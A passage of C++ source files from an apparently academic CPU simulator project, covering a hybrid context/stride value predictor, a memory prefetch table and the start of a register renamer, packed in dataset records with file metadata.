(found == 2) {\n\t\t\ttag = hash(PC, predict[tag1].last_val3, LV2, LV1, 0);\n\t\t\tvalue = vpt[tag].value;\n\t\t}\n\t\telse if (found == 1) {\n\t\t\ttag = hash(PC, predict[tag1].last_val2, predict[tag1].last_val3, LV1, 0);\n\t\t\tvalue = vpt[tag].value;\n\t\t}\n\t\telse if (found == 0) {\n\t\t\ttag = hash(PC, predict[tag1].last_val, predict[tag1].last_val2, predict[tag1].last_val, 0);\n\t\t\tvalue = vpt[tag].value;\n\t\t}\n\t}\n\telse if (order == 2) {\n\t\tif (found == 2) {\n\t\t\ttag = hash(PC, LV2, LV1, 0, 0);\n\t\t\tvalue = vpt[tag].value;\n\t\t}\n\t\telse if (found == 1) {\n\t\t\ttag = hash(PC, predict[tag1].last_val2, LV1, 0, 0);\n\t\t\tvalue = vpt[tag].value;\n\t\t}\n\t\telse if (found == 0) {\n\t\t\ttag = hash(PC, predict[tag1].last_val, 
predict[tag1].last_val2, 0, 0);\n\t\t\tvalue = vpt[tag].value;\n\t\t}\n\t}\n\telse if (order == 1) {\n\t\tif (found == 1) {\n\t\t\ttag = hash(PC, LV1, 0, 0, 0);\n\t\t\tvalue = vpt[tag].value;\n\t\t}\n\t\telse if (found == 0) {\n\t\t\ttag = hash(PC, predict[tag1].last_val, 0, 0, 0);\n\t\t\tvalue = vpt[tag].value;\n\t\t}\n\t}\n\treturn value;\n}\n\nuint64_t predictor::get_hybrid_val(uint64_t LV1, uint64_t LV2,uint64_t LV3,uint64_t LV4, uint64_t found, uint64_t PC)\n{\n\tuint64_t value_con, value_str, tag;\n\tuint64_t tag1;\n\ttag1 = PC >> 2;\n\thybrid = 1;\n\ttag1 = tag1 & 32767;\n\tbool choose;\n\tif (chooser[tag]>=2){\n\t\tchoose = 1;\n\t}\n\telse{\n\t\tchoose = 0;\n\t}\n\tvalue_con = get_context_val(LV1, LV2, LV3, LV4, found, PC);\n\n\tvalue_str = hystride[tag].last_val + (hystride[tag].del * found);\n\tif (choose) {\n\t\treturn value_con;\n\t}\n\telse{\n\t\treturn value_str;\n\t}\n\n}\n\n\n// uint64_t predictor::hash(uint64_t PC, uint64_t value1, uint64_t value2, uint64_t value3, uint64_t value4)\n// {\n// \tuint64_t tag,tag1,x1,x2,x3;\n// \tif (order == 4) {\n// \t\tPC = PC >>2;\n// \t\tvalue3 = value3 ^ PC;\n// \t\t//value3 = value3 << 8;\n// \t\tvalue2 = value2 ^ PC;\n// \t\t//value2 = value2 << 16;\n// \t\tvalue1 = value1 ^ PC;\n// \t\t//value1 = value1 << 24;\n// \t\tvalue4 = value4 ^ PC;\n//\n// \t\ttag = value1+value2+value3+value4;\n// \t\ttag1 = pow(2,25);\n// \t\ttag1 = tag1 - 1;\n// \t\ttag = tag & tag1;\n// \t}\n// \telse if (order == 3) {\n// \t\tvalue1 = value1 ^ PC;\n// \t\tvalue2 = value2 ^ PC;\n// \t\tvalue3 = value3 ^ PC;\n// \t\t// value1 = value1 << 20;\n// \t\t// value2 = value2 << 10;\n// \t\t// tag = value1+value2+value3+value4;\n// \t\tPC = PC >>2;\n// \t\ttag = value1+value2+value3;\n// \t\ttag1 = pow(2,25);\n// \t\ttag1 = tag1 - 1;\n// \t\ttag = tag & tag1;\n// \t}\n// \telse if (order == 2) {\n// \t\t// PC = PC << 20;\n// \t\t// value1 = value1 & 1023;\n// \t\t// value2 = value2 & 1023;\n// \t\t// value1 = value1 << 10;\n// \t\tPC = PC 
>> 2;\n// \t\ttag = PC^value1^value2;\n// \t\ttag1 = pow(2,25);\n// \t\ttag1 = tag1 - 1;\n// \t\ttag = tag & tag1;\n// \t}\n// \telse if (order == 1){\n// \t\t// value1 = value1 & 32767;\n// \t\t// PC = PC & 32767;\n// \t\t// PC = PC << 15;\n// \t\tPC = PC >>2;\n// \t\ttag = PC^value1;\n// \t\ttag1 = pow(2,25);\n// \t\ttag1 = tag1 - 1;\n// \t\ttag = tag & tag1;\n// \t}\n// \tenqueue(tag);\n// \tHASH = tag;\n// \treturn tag;\n// }\n\n// uint64_t predictor::hash(uint64_t PC, uint64_t value1, uint64_t value2, uint64_t value3, uint64_t value4)\n// {\n// \tuint64_t tag,tag1,x1,x2,x3;\n// \tif (order == 4) {\n// \t\tvalue3 = value3 ^ PC;\n// \t\tvalue3 = value3 << 8;\n// \t\tvalue2 = value2 ^ PC;\n// \t\tvalue2 = value2 << 16;\n// \t\tvalue1 = value1 ^ PC;\n// \t\tvalue1 = value1 << 24;\n// \t\tvalue4 = value4 ^ PC;\n// \t\ttag = value1+value2+value3+value4;\n// \t\ttag1 = pow(2,25);\n// \t\ttag1 = tag1 - 1;\n// \t\ttag = tag & tag1;\n// \t}\n// \telse if (order == 3) {\n// \t\tvalue1 = value1 ^ PC;\n// \t\tvalue2 = value2 ^ PC;\n// \t\tvalue3 = value3 ^ PC;\n// \t\tvalue1 = value1 << 20;\n// \t\tvalue2 = value2 << 10;\n// \t\ttag = value1+value2+value3+value4;\n// \t\ttag1 = pow(2,25);\n// \t\ttag1 = tag1 - 1;\n// \t\ttag = tag & tag1;\n// \t}\n// \telse if (order == 2) {\n// \t\tPC = PC << 25;\n// \t\tvalue1 = value1 & 1023;\n// \t\tvalue2 = value2 & 1023;\n// \t\tvalue1 = value1 << 10;\n// \t\ttag = PC+value1+value2;\n// \t\ttag1 = pow(2,25);\n// \t\ttag1 = tag1 - 1;\n// \t\ttag = tag & tag1;\n// \t}\n// \telse if (order == 1){\n// \t\tvalue1 = value1 & 32767;\n// \t\tPC = PC & 32767;\n// \t\tPC = PC << 15;\n// \t\ttag = PC + value1;\n// \t\ttag1 = pow(2,25);\n// \t\ttag1 = tag1 - 1;\n// \t\ttag = tag & tag1;\n// \t\t//tag = value1;\n// \t}\n// \tenqueue(tag);\n// \tHASH = tag;\n// \treturn tag;\n// }\n\nuint64_t predictor::hash(uint64_t PC, uint64_t value1, uint64_t value2, uint64_t value3, uint64_t value4)\n{\n\tuint64_t tag,tag1,x1,x2,x3;\n\tif (order == 4) 
{\n\t\tPC = PC >>2;\n\t\t// value3 = value3 ^ PC;\n\t\t// //value3 = value3 << 8;\n\t\t// value2 = value2 ^ PC;\n\t\t// //value2 = value2 << 16;\n\t\t// value1 = value1 ^ PC;\n\t\t// //value1 = value1 << 24;\n\t\t// value4 = value4 ^ PC;\n\n\t\ttag = value1+value2+value3+value4;\n\t\ttag1 = pow(2,25);\n\t\ttag1 = tag1 - 1;\n\t\ttag = tag & tag1;\n\t}\n\telse if (order == 3) {\n\t\t// value1 = value1 ^ PC;\n\t\t// value2 = value2 ^ PC;\n\t\t// value3 = value3 ^ PC;\n\t\t// value1 = value1 << 20;\n\t\t// value2 = value2 << 10;\n\t\t// tag = value1+value2+value3+value4;\n\t\tPC = PC >>2;\n\t\ttag = value1+value2+value3;\n\t\ttag1 = pow(2,25);\n\t\ttag1 = tag1 - 1;\n\t\ttag = tag & tag1;\n\t}\n\telse if (order == 2) {\n\t\t// PC = PC << 20;\n\t\t// value1 = value1 & 1023;\n\t\t// value2 = value2 & 1023;\n\t\t// value1 = value1 << 10;\n\t\tPC = PC >> 2;\n\t\ttag = value1+value2;\n\t\ttag1 = pow(2,25);\n\t\ttag1 = tag1 - 1;\n\t\ttag = tag & tag1;\n\t}\n\telse if (order == 1){\n\t\t// value1 = value1 & 32767;\n\t\t// PC = PC & 32767;\n\t\t// PC = PC << 15;\n\t\tPC = PC >>2;\n\t\ttag = PC+value1;\n\t\ttag1 = pow(2,25);\n\t\ttag1 = tag1 - 1;\n\t\ttag = tag & tag1;\n\t}\n\tenqueue(tag);\n\tHASH = tag;\n\treturn tag;\n}\n\nvoid predictor::enqueue(uint64_t tag)\n{\n\tupdate_queue[uq_tail] = tag;\n\tif(uq_tail == (al_size-1))\n\t{\n\t\tuq_tail = 0;\n\t}\n\telse\n\t{\n\t\tuq_tail++;\n\t}\n}\n\nvoid predictor::update_predict(uint64_t value, uint64_t PC, uint64_t index)\n{\n\tuint64_t delta;\n\tuint64_t tag = PC>>2;\n\ttag = tag & 32767;\n\n\tdelta = value - predict[tag].last_val;\n\n\tif (counter == 1)\n\t{\n\n\n\tif (delta == predict[tag].del)\n\t{\n\t\tif (predict[tag].conf < 31)\n\t\t{\n\t\t\tpredict[tag].conf++;\n\t\t}\n\t}\n\telse\n\t{\n\t\tif (predict[tag].conf > 0)\n\t\t{\n\t\t\tpredict[tag].conf = 0;\n\t\t}\n\t}\n\n\tpredict[tag].del = delta;\n\tpredict[tag].last_val = value;\n\n\t}\n\n\tif (counter == 2)\n\t{\n\t\tif (value == predict[tag].last_val)\n\t\t{\n\t\t\tif 
(predict[tag].conf < 31)\n\t\t\t{\n\t\t\tpredict[tag].conf++;\n\t\t\t}\n\t\t}\n\t\telse\n\t\t{\n\t\t\tif (predict[tag].conf > 0)\n\t\t\t{\n\t\t\tpredict[tag].conf = 0;\n\t\t\t}\n\t\t}\n\t\tpredict[tag].last_val = value;\n\t}\n\tif (counter == 3 && !hybrid)\n\t{\n\t\ttag = index;\n\n\t\tif(value == vpt[tag].value)\n\t\t{\n\t\t\tif(vpt[tag].conf < 31)\n\t\t\t{\n\t\t\t\tvpt[tag].conf++;\n\t\t\t}\n\t\t}\n\t\telse\n\t\t{\n\t\t\tif(vpt[tag].conf >0)\n\t\t\t{\n\t\t\t\tvpt[tag].conf=0;\n\t\t\t\t// vpt[tag].value = value;\n\t\t\t}\n\t\t\tvpt[tag].value = value;\n\t\t}\n\n\t\tif(uq_head == (al_size-1))\n\t\t{\n\t\t\tuq_head = 0;\n\t\t}\n\t\telse\n\t\t{\n\t\t\tuq_head++;\n\t\t}\n\n\t\ttag = PC>>2;\n\t\ttag = tag & 32767;\n\t\tif (order == 4) {\n\t\t\tpredict[tag].last_val = predict[tag].last_val2;\n\t\t\tpredict[tag].last_val2 = predict[tag].last_val3;\n\t\t\tpredict[tag].last_val3 = predict[tag].last_val4;\n\t\t\tpredict[tag].last_val4 = value;\n\t\t}\n\t\telse if (order == 3) {\n\t\t\tpredict[tag].last_val = predict[tag].last_val2;\n\t\t\tpredict[tag].last_val2 = predict[tag].last_val3;\n\t\t\tpredict[tag].last_val3 = value;\n\t\t}\n\t\telse if(order == 2){\n\t\t\tpredict[tag].last_val = predict[tag].last_val2;\n\t\t\tpredict[tag].last_val2 = value;\n\t\t}\n\t\telse if(order == 1){\n\t\t\tpredict[tag].last_val = value;\n\t\t}\n\t}\n\tif (hybrid) {\n\t\t//bool choose;\n\t\t// if (chooser[tag] >= 2) {\n\t\t// \tchoose = 1;\n\t\t// }\n\t\t// else{\n\t\t// \tchoose = 0;\n\t\t// }\n\t\tif (value == vpt[index].value) {\n\t\t\tif (chooser[tag] < 3) {\n\t\t\t\tchooser[tag]++;\n\t\t\t}\n\t\t}\n\t\telse if (value == hystride[tag].last_val) {\n\t\t\tif (chooser[tag] > 0) {\n\t\t\t\tchooser[tag]--;\n\t\t\t}\n\t\t}\n\t\t if (choose) {\n\t\t\ttag = index;\n\t\t\tif(value == vpt[tag].value)\n\t\t\t{\n\t\t\t\tif(vpt[tag].conf < 31)\n\t\t\t\t{\n\t\t\t\t\tvpt[tag].conf++;\n\t\t\t\t}\n\t\t\t}\n\t\t\telse\n\t\t\t{\n\t\t\t\tif(vpt[tag].conf 
>0)\n\t\t\t\t{\n\t\t\t\t\tvpt[tag].conf=0;\n\t\t\t\t\t// vpt[tag].value = value;\n\t\t\t\t}\n\t\t\t\tvpt[tag].value = value;\n\t\t\t}\n\n\t\t\tif(uq_head == (al_size-1))\n\t\t\t{\n\t\t\t\tuq_head = 0;\n\t\t\t}\n\t\t\telse\n\t\t\t{\n\t\t\t\tuq_head++;\n\t\t\t}\n\n\t\t\ttag = PC>>2;\n\t\t\ttag = tag & 32767;\n\t\t\tif (order == 4) {\n\t\t\t\tpredict[tag].last_val = predict[tag].last_val2;\n\t\t\t\tpredict[tag].last_val2 = predict[tag].last_val3;\n\t\t\t\tpredict[tag].last_val3 = predict[tag].last_val4;\n\t\t\t\tpredict[tag].last_val4 = value;\n\t\t\t}\n\t\t\telse if (order == 3) {\n\t\t\t\tpredict[tag].last_val = predict[tag].last_val2;\n\t\t\t\tpredict[tag].last_val2 = predict[tag].last_val3;\n\t\t\t\tpredict[tag].last_val3 = value;\n\t\t\t}\n\t\t\telse if(order == 2){\n\t\t\t\tpredict[tag].last_val = predict[tag].last_val2;\n\t\t\t\tpredict[tag].last_val2 = value;\n\t\t\t}\n\t\t\telse if(order == 1){\n\t\t\t\tpredict[tag].last_val = value;\n\t\t\t}\n\t\t }\n\t\t else\n\t\t{\n\t\t\tdelta = value - hystride[tag].last_val;\n\t\t\tif (delta == hystride[tag].del)\n\t\t\t{\n\t\t\t\tif (hystride[tag].conf < 31)\n\t\t\t\t{\n\t\t\t\t\thystride[tag].conf++;\n\t\t\t\t}\n\t\t\t}\n\t\t\telse\n\t\t\t{\n\t\t\t\tif (hystride[tag].conf > 0)\n\t\t\t\t{\n\t\t\t\t\thystride[tag].conf = 0;\n\t\t\t\t}\n\t\t\t}\n\t\t\thystride[tag].del = delta;\n\t\t\thystride[tag].last_val = value;\n\t\t}\n\t}\n}\n\n\nvoid predictor::dec_iter(uint64_t PC)\n{\n\tuint64_t tag = PC>>2;\n\ttag = tag & 32767;\n\tif (predict[tag].iter_count > 0)\n\t{\n\t\tpredict[tag].iter_count--;\n\t}\n}\n\nvoid predictor::checkpoint_context(uint64_t tail)\n{\n uq_tail = tail;\n}\n\nvoid predictor::inc_iter(uint64_t PC)\n{\n\tuint64_t tag = PC>>2;\n\ttag = tag & 32767;\n\tpredict[tag].iter_count++;\n}\n\nvoid predictor::clear_predictor()\n{\n\n\tuint64_t count = pow(2,15);\n\tfor (uint64_t i = 0; i < count; i++)\n\t{\n\t\tpredict[i].iter_count = 0;\n\t}\n\n\tuq_head = 0;\n\tuq_tail = 0;\n}\n\nbool 
predictor::get_conf(uint64_t PC)\n{\n\tuint64_t tag = PC>>2;\n\ttag = tag & 32767;\n\tif(predict[tag].conf == 31)\n\t{\n\t\treturn true;\n\t}\n\telse\n\t{\n\t\treturn false;\n\t}\n}\n\nbool predictor::get_context_conf(uint64_t LV1, uint64_t LV2,uint64_t LV3, uint64_t LV4, uint64_t found, uint64_t PC)\n{\n\tuint64_t value, tag;\n\tuint64_t tag1;\n\ttag1 = PC >> 2;\n\ttag1 = tag1 & 32767;\n\tcounter = 3;\n\tif (order == 4) {\n\t\tif(found >= 4)\n\t\t{\n\t\t\ttag = hash(PC,LV4, LV3, LV2, LV1);\n\t\t\tvalue = vpt[tag].conf;\n\t\t}\n\t\telse if (found == 3)\n\t\t{\n\t\t\ttag = hash(PC, predict[tag1].last_val4,LV3,LV2, LV1);\n\t\t\tvalue = vpt[tag].conf;\n\t\t}\n\t\telse if (found == 2)\n\t\t{\n\t\t\ttag = hash(PC, predict[tag1].last_val3, predict[tag1].last_val4,LV2,LV1);\n\t\t\tvalue = vpt[tag].conf;\n\t\t}\n\t\telse if (found == 1)\n\t\t{\n\t\t\ttag = hash(PC, predict[tag1].last_val2, predict[tag1].last_val3,predict[tag1].last_val4,LV1);\n\t\t\tvalue = vpt[tag].conf;\n\t\t}\n\t\telse if (found == 0)\n\t\t{\n\t\t\ttag = hash(PC,predict[tag1].last_val, predict[tag1].last_val2, predict[tag1].last_val3, predict[tag1].last_val4);\n\t\t\tvalue = vpt[tag].conf;\n\t\t}\n\t}\n\telse if (order == 3) {\n\t\tif (found == 3) {\n\t\t\ttag = hash(PC, LV3, LV2, LV1, 0);\n\t\t\tvalue = vpt[tag].conf;\n\t\t}\n\t\telse if (found == 2) {\n\t\t\ttag = hash(PC, predict[tag1].last_val3, LV2, LV1, 0);\n\t\t\tvalue = vpt[tag].conf;\n\t\t}\n\t\telse if (found == 1) {\n\t\t\ttag = hash(PC, predict[tag1].last_val2, predict[tag1].last_val3, LV1, 0);\n\t\t\tvalue = vpt[tag].conf;\n\t\t}\n\t\telse if (found == 0) {\n\t\t\ttag = hash(PC, predict[tag1].last_val, predict[tag1].last_val2, predict[tag1].last_val, 0);\n\t\t\tvalue = vpt[tag].conf;\n\t\t}\n\t}\n\telse if (order == 2) {\n\t\tif (found == 2) {\n\t\t\ttag = hash(PC, LV2, LV1, 0, 0);\n\t\t\tvalue = vpt[tag].conf;\n\t\t}\n\t\telse if (found == 1) {\n\t\t\ttag = hash(PC, predict[tag1].last_val2, LV1, 0, 0);\n\t\t\tvalue = 
vpt[tag].conf;\n\t\t}\n\t\telse if (found == 0) {\n\t\t\ttag = hash(PC, predict[tag1].last_val, predict[tag1].last_val2, 0, 0);\n\t\t\tvalue = vpt[tag].conf;\n\t\t}\n\t}\n\telse if (order == 1) {\n\t\tif (found == 1) {\n\t\t\ttag = hash(PC, LV1, 0, 0, 0);\n\t\t\tvalue = vpt[tag].conf;\n\t\t}\n\t\telse if (found == 0) {\n\t\t\ttag = hash(PC, predict[tag1].last_val, 0, 0, 0);\n\t\t\tvalue = vpt[tag].conf;\n\t\t}\n\t}\n\tif (value == 31) {\n\t\treturn 1;\n\t}\n\telse{\n\t\treturn 0;\n\t}\n}\n\nbool predictor::get_hybrid_conf(uint64_t LV1, uint64_t LV2,uint64_t LV3,uint64_t LV4, uint64_t found, uint64_t PC)\n{\n\tuint64_t value, tag, conf;\n\tuint64_t tag1;\n\ttag1 = PC >> 2;\n\ttag1 = tag1 & 32767;\n\n\thybrid = 1;\n\tif (chooser[tag] >= 2) {\n\t\tchoose = 1;\n\t}\n\telse{\n\t\tchoose = 0;\n\t}\n\tif (choose) {\n\t\tconf = get_context_conf(LV1, LV2, LV3, LV4, found, PC);\n\t\treturn conf;\n\t}\n\telse{\n\t\tif(hystride[tag].conf == 31)\n\t\t{\n\t\t\treturn true;\n\t\t}\n\t\telse\n\t\t{\n\t\t\treturn false;\n\t\t}\n\t}\n\n}\n\npredictor::~predictor()\n{\n\n}\n" }, { "alpha_fraction": 0.5883849859237671, "alphanum_fraction": 0.6015733480453491, "avg_line_length": 17.825687408447266, "blob_id": "d95a5ba051c87b5bad584ccd5832b3fe850fdd68", "content_id": "e78df5e95cd15eef5a4d5b52f76a16a1ff9b26c2", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 4322, "license_type": "no_license", "max_line_length": 113, "num_lines": 218, "path": "/721sim-partial/uarchsim/mpt.cc", "repo_name": "SureshN-Git/Hybrid_Address_Value_Predictor", "src_encoding": "UTF-8", "text": "#include \"pipeline.h\"\r\n\r\n// constructor\r\nmpt::mpt(unsigned int size) {\r\n\r\n\t// Initialize the Memory Prefetch Table\r\n\tmp_table = new mpt_table[size];\r\n\tthis->size = size;\r\n\r\n}\r\n\r\nbool mpt::read_entry(unsigned int pc) {\r\n\r\n\tunsigned int mask = size - 1;\r\n\tunsigned int mpt_index = ((pc >> 2) & 
mask);\r\n\tmp_table[mpt_index].pred_count++;\r\n\tif (mp_table[mpt_index].valid) {\r\n\t\t//PAY.buf[index].mpt_hit = true;\r\n\t\treturn true;\r\n\t}\r\n\telse {\r\n\t\t//PAY.buf[index].mpt_hit = false;\r\n\t\treturn false;\r\n\t}\r\n}\r\n\r\nvoid mpt::create_entry(reg_t current_addr, unsigned int pc) {\r\n\r\n\tunsigned int mask = size - 1;\r\n\tunsigned int mpt_index = ((pc >> 2) & mask);\r\n\r\n\tmp_table[mpt_index].valid = 1;\r\n\tmp_table[mpt_index].effective_address = current_addr;\r\n\tmp_table[mpt_index].stride = 0;\r\n\tmp_table[mpt_index].shb = 0;\r\n\tmp_table[mpt_index].next_predicted_address = 0;\r\n\r\n\tif (mp_table[mpt_index].pred_count == 0)\r\n\t\tmp_table[mpt_index].pred_count = 0;\r\n\telse\r\n\t\tmp_table[mpt_index].pred_count--;\r\n\r\n}\r\n\r\n\r\nbool mpt::is_addr_predictable(unsigned int pc) {\r\n\r\n\tunsigned int mask = size - 1;\r\n\tunsigned int mpt_index = ((pc >> 2) & mask);\r\n\r\n\r\n\r\n\t//if (mp_table[mpt_index].shb >= 15 && mp_table[mpt_index].dispatch_conf >=2) {\r\n\tif (mp_table[mpt_index].shb >= 15) {\r\n\r\n\r\n\t\t//printf(\"Number of Predicted Instructions : %d \\n\", predictionCount);\r\n\t\treturn true;\r\n\r\n\r\n\t}\r\n\telse {\r\n\t\treturn false;\r\n\t}\r\n\r\n\r\n}\r\n\r\nunsigned int mpt::predict_address(unsigned int pc) {\r\n\r\n\tunsigned int mask = size - 1;\r\n\tunsigned int mpt_index = ((pc >> 2) & mask);\r\n\r\n\r\n\t\treturn mp_table[mpt_index].effective_address + ((mp_table[mpt_index].pred_count) * mp_table[mpt_index].stride);\r\n\r\n\r\n}\r\n\r\n\r\nunsigned int mpt::predict_next_addr(unsigned int pc) {\r\n\r\n\tunsigned int mask = size - 1;\r\n\tunsigned int mpt_index = ((pc >> 2) & mask);\r\n\r\n\tif (mp_table[mpt_index].shb >= 2) {\r\n\r\n\t\t\treturn mp_table[mpt_index].effective_address + (2 * mp_table[mpt_index].stride);\r\n\r\n\t}\r\n\r\n}\r\n\r\n\r\nvoid mpt::update_entry(reg_t current_addr, unsigned int pc, int inst_issue_delay) {\r\n\r\n\tunsigned int mask = size - 1;\r\n\tunsigned int 
mpt_index = ((pc >> 2) & mask);\r\n\r\n\t// Updating Pred Count\r\n\tif (mp_table[mpt_index].pred_count == 0)\r\n\t\tmp_table[mpt_index].pred_count = 0;\r\n\telse\r\n\t\tmp_table[mpt_index].pred_count--;\r\n\r\n\r\n\r\n\t//if (current_addr >= mp_table[mpt_index].effective_address) {\r\n\t// Updating SHB\r\n\tif (current_addr - mp_table[mpt_index].effective_address == mp_table[mpt_index].stride) {\r\n\t\tif (mp_table[mpt_index].shb == 15)\r\n\t\t\tmp_table[mpt_index].shb = 15;\r\n\t\telse\r\n\t\t\tmp_table[mpt_index].shb++;\r\n\t}\r\n\telse {\r\n\t\tif (mp_table[mpt_index].shb == 0)\r\n\t\t\tmp_table[mpt_index].shb = 0;\r\n\t\telse\r\n\t\t\tmp_table[mpt_index].shb = 0;\r\n\t}\r\n\r\n\r\n\t// Updating Stride\r\n\tmp_table[mpt_index].stride = current_addr - mp_table[mpt_index].effective_address;\r\n\r\n\r\n\t// Updaing Effective Address\r\n\tmp_table[mpt_index].effective_address = current_addr;\r\n\r\n\t// Updaing Dispatch Confidence\r\n\r\n\tif(inst_issue_delay < 3)\r\n\t{\r\n\t\tmp_table[mpt_index].dispatch_conf = 0;\r\n\t}\r\n\r\n\telse\r\n\t{\r\n\tif (mp_table[mpt_index].dispatch_conf == 2)\r\n\t\t\tmp_table[mpt_index].dispatch_conf = 2;\r\n\t\telse\r\n\t\t\tmp_table[mpt_index].dispatch_conf++;\r\n\t}\r\n\r\n\t//}\r\n\t/*else {\r\n\r\n\t\tif (mp_table[mpt_index].effective_address - current_addr == mp_table[mpt_index].stride) {\r\n\t\t\tif (mp_table[mpt_index].shb == 100)\r\n\t\t\t\tmp_table[mpt_index].shb = 100;\r\n\t\t\telse\r\n\t\t\t\tmp_table[mpt_index].shb++;\r\n\t\t}\r\n\t\telse {\r\n\t\t\tif (mp_table[mpt_index].shb == 0)\r\n\t\t\t\tmp_table[mpt_index].shb = 0;\r\n\t\t\telse\r\n\t\t\t\tmp_table[mpt_index].shb = 0;\r\n\t\t}\r\n\t\t//printf(\"SHB = %d \\n\",mp_table[mpt_index].shb);\r\n\r\n\r\n\t\t\tmp_table[mpt_index].stride = mp_table[mpt_index].effective_address - current_addr;\r\n\r\n\r\n\t}*/\r\n\r\n\r\n\r\n\r\n\r\n\r\n}\r\n\r\n\r\nvoid mpt::set_confidence_low(unsigned int pc) {\r\n\r\n\tunsigned int mask = size - 1;\r\n\tunsigned int mpt_index = ((pc >> 
2) & mask);\r\n\r\n\tmp_table[mpt_index].shb = 0;\r\n\r\n}\r\n\r\n\r\nvoid mpt::squash_pred_count() {\r\n\r\n\tfor (int i = 0; i <= size - 1; i++) {\r\n\r\n\t\tmp_table[i].pred_count = 0;\r\n\t}\r\n\r\n\r\n\r\n\r\n\r\n}\r\n\r\nvoid mpt::dec_pred_count(unsigned int pc) {\r\n\r\n\r\n\tunsigned int mask = size - 1;\r\n\tunsigned int mpt_index = ((pc >> 2) & mask);\r\n\r\n\t\tmp_table[mpt_index].pred_count--;\r\n\r\n}\r\n\r\nvoid mpt::inc_pred_count(unsigned int pc) {\r\n\r\n\r\n\tunsigned int mask = size - 1;\r\n\tunsigned int mpt_index = ((pc >> 2) & mask);\r\n\r\n\t\tmp_table[mpt_index].pred_count++;\r\n\r\n}\r\n" }, { "alpha_fraction": 0.5148192048072815, "alphanum_fraction": 0.526340901851654, "avg_line_length": 31.20052719116211, "blob_id": "b3a14e9492c9fe1b8ae74e51de32a50149461dc2", "content_id": "f72a92cc90f1c6dd4eef09c44c03ffbe4b5fe5b7", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 25172, "license_type": "no_license", "max_line_length": 96, "num_lines": 758, "path": "/721sim-partial/uarchsim/renamer.cc", "repo_name": "SureshN-Git/Hybrid_Address_Value_Predictor", "src_encoding": "UTF-8", "text": "#include <iostream>\r\n#include \"renamer.h\"\r\n#include <assert.h>\r\n#include <bitset>\r\n\r\n\r\n////////////////////////////////////////\r\n// Public functions.\r\n////////////////////////////////////////\r\n\r\n/////////////////////////////////////////////////////////////////////\r\n// This is the constructor function.\r\n// When a renamer object is instantiated, the caller indicates:\r\n// 1. The number of logical registers (e.g., 32).\r\n// 2. The number of physical registers (e.g., 128).\r\n// 3. 
The maximum number of unresolved branches.\r\n// Requirement: 1 <= n_branches <= 64.\r\n//\r\n// Tips:\r\n//\r\n// Assert the number of physical registers > number logical registers.\r\n// Assert 1 <= n_branches <= 64.\r\n// Then, allocate space for the primary data structures.\r\n// Then, initialize the data structures based on the knowledge\r\n// that the pipeline is intially empty (no in-flight instructions yet).\r\n/////////////////////////////////////////////////////////////////////\r\n using namespace std;\r\n\t\r\n renamer::renamer(uint64_t n_log_regs, uint64_t n_phys_regs, uint64_t n_branches)\r\n\t{\r\n std::cout << \"Start ----------------------------------------------------\" << std::endl;\r\n cout << \"Number of Physical Registers : \" << n_phys_regs << endl;\r\n cout << \"Number of logical Registers : \" << n_log_regs << endl;\r\n cout << \"Number of Branch Checkpoints : \" << n_branches<< endl;\r\n\t\tassert((n_phys_regs > n_log_regs) && (n_branches >= 1) && (n_branches <= 64));\r\n\t\t\trmt = new uint64_t[n_log_regs];\r\n\t\t\tamt = new uint64_t[n_log_regs];\r\n\t\t\tfl = new freeList[n_phys_regs - n_log_regs];\r\n\t\t\tflHead = 0;\r\n\t\t\tflTail = 0;\r\n\t\t\tactList = new activeList[n_phys_regs - n_log_regs];\r\n\t\t\talHead = 0;\r\n\t\t\talTail = 0;\r\n\t\t\tphyList = new uint64_t[n_phys_regs];\r\n\t\t\t\r\n\t\t\t// Initializing Branch Checkpoint\r\n\t\t\tbCheckPoint = new branchCheckpoint[n_branches];\r\n\t\t\tfor (int i = 0; i <= n_branches - 1; i++) {\r\n\t\t\t\tbCheckPoint[i].shadowMapTable = new uint64_t[n_log_regs];\r\n\t\t\t\tbCheckPoint[i].GBM = 0;\r\n\t\t\t}\r\n\t\t\t\r\n\t\t\tphyRegisterReady = new uint64_t[n_phys_regs];\r\n\r\n\t\t\tfor (int i = 0; i <= n_log_regs-1; i++) {\r\n\t\t\t\trmt[i] = i;\r\n\t\t\t}\r\n\r\n\t\t\tfor (int i = 0; i <= n_log_regs-1; i++) {\r\n\t\t\t\tamt[i] = i;\r\n\t\t\t}\r\n\r\n\t\t\tfor (int i = 0; i <= n_phys_regs-1; i++) {\r\n\t\t\t\tphyList[i] = 0;\r\n\t\t\t}\r\n\r\n\t\t\tfor (int i = 0; i <= (n_phys_regs - 
n_log_regs - 1); i++) {\r\n\t\t\t\tfl[i].physicalReg = i+n_log_regs;\r\n\t\t\t\tfl[i].valid = 1;\r\n\t\t\t}\r\n\r\n\t\t\tfor (int i = 0; i <= (n_phys_regs - n_log_regs - 1); i++) {\r\n\t\t\t\tactList[i].valid = 0;\r\n //actList[i].ready = 0;\r\n\t\t\t}\r\n\r\n\t\t\tfor (int i = 0; i <= (n_phys_regs - 1); i++) { ////////----------------------\r\n\t\t\t\tphyRegisterReady[i] = 1;\r\n\t\t\t}\r\n\r\n\t\t\tGBM = 0;\r\n \r\n phyRegSize = n_phys_regs;\r\n\t\t\tlogRegSize = n_log_regs;\r\n\t\t\tnumOfBranch = n_branches;\r\n \r\n \r\n\r\n\t}\r\n\r\n\r\n\r\n\t//////////////////////////////////////////\r\n\t\t// Functions related to Rename Stage. //\r\n\t\t//////////////////////////////////////////\r\n\r\n\t\t/////////////////////////////////////////////////////////////////////\r\n\t\t// The Rename Stage must stall if there aren't enough free physical\r\n\t\t// registers available for renaming all logical destination registers\r\n\t\t// in the current rename bundle.\r\n\t\t//\r\n\t\t// Inputs:\r\n\t\t// 1. 
